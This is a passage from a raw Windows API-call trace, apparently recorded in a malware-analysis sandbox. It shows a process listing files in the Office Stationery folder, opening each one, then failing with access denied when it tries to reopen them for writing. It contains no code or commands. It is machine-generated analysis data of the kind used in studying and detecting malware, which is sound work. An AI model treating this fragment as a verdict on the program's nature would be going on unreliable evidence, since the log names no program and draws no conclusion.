(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.120] AreFileApisANSI () returned 1 [0087.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0087.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a2d0 [0087.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 70 [0087.120] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a3ecc0a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5d2da05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5d2da05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x285)) returned 1 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0087.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.121] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0087.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0087.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0087.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.122] AreFileApisANSI () returned 1 [0087.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm", lpUsedDefaultChar=0x0) returned 69 [0087.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0087.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0087.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0087.122] AreFileApisANSI () returned 1 [0087.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0087.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0087.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 69 [0087.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.123] GetFileType (hFile=0x424) returned 0x1 [0087.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0087.123] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.123] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.124] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.124] CloseHandle (hObject=0x424) returned 1 [0087.124] AreFileApisANSI () returned 1 [0087.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0087.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0087.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 69 [0087.124] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.124] GetLastError () returned 0x5 [0087.124] GetLastError () returned 0x5 [0087.124] SetLastError (dwErrCode=0x5) [0087.124] GetLastError () returned 0x5 [0087.124] SetLastError (dwErrCode=0x5) [0087.124] GetLastError () returned 0x5 [0087.124] SetLastError (dwErrCode=0x5) [0087.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0087.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0087.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.125] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0087.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0087.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0087.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0087.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0087.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0087.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0087.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.126] AreFileApisANSI () returned 1 [0087.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg", lpUsedDefaultChar=0x0) returned 69 [0087.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0087.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0087.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.126] AreFileApisANSI () returned 1 [0087.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0087.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0087.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 69 [0087.127] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.129] GetFileType (hFile=0x348) returned 0x1 [0087.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0087.129] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.129] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.129] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.130] CloseHandle (hObject=0x348) returned 1 [0087.130] AreFileApisANSI () returned 1 [0087.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0087.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0087.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 69 [0087.130] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.130] GetLastError () returned 0x5 [0087.130] GetLastError () returned 0x5 [0087.130] SetLastError (dwErrCode=0x5) [0087.130] GetLastError () returned 0x5 [0087.130] SetLastError (dwErrCode=0x5) [0087.130] GetLastError () returned 0x5 [0087.130] SetLastError (dwErrCode=0x5) [0087.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0087.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0087.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.130] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Green Bubbles.htm", cAlternateFileName="")) returned 1 [0087.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0087.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0087.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.131] AreFileApisANSI () returned 1 [0087.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm", lpUsedDefaultChar=0x0) returned 76 [0087.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0087.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0087.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0087.132] AreFileApisANSI () returned 1 [0087.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0087.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85580 [0087.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 76 [0087.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.132] GetFileType (hFile=0x348) returned 0x1 [0087.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 